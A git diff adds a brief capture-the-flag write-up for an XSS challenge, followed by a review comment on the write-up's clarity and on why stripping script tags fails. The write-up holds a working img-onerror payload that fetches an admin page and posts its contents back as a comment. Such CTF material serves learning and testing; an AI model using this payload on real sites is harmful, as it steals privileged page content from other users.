Diffstat (limited to 'punkctf/web_04.md')
-rw-r--r-- punkctf/web_04.md 7
1 files changed, 7 insertions, 0 deletions
diff --git a/punkctf/web_04.md b/punkctf/web_04.md
new file mode 100644
index 0000000..f0cffaa
--- /dev/null
+++ b/punkctf/web_04.md
@@ -0,0 +1,7 @@
+
+Now our input sanitises out script fields, however it still allows us to make images.
+We use the normal technique of putting a bad image url in them, then adding js in the onerror attribute, with the same JS as `XSS - Medium`.
+
+```
+<img src=x onerror="fetch('/admin').then(r => r.text()).then(d => {let data = new URLSearchParams(); data.append('name', 'admin page'); data.append('comment', d); fetch('/new-comment', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: data });})">
+```
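Review bot: The new file has no title and opens with a blank line, so nothing in it names the challenge it covers; add a heading as the first line. The phrase "the same JS as `XSS - Medium`" only works if the reader already knows that write-up, so reference the file it lives in or say in one sentence what the script does (read /admin and post the response body to /new-comment as a comment). "Sanitises out script fields" presumably means script elements; it is worth stating the root cause explicitly: the filter strips script tags but leaves event-handler attributes such as onerror on img, which is why tag stripping is not a sufficient fix compared with output encoding or an allow-list sanitiser that drops on* attributes. The fenced block has no language tag (html would fit), and the payload is a single very long line that would be easier to review if wrapped.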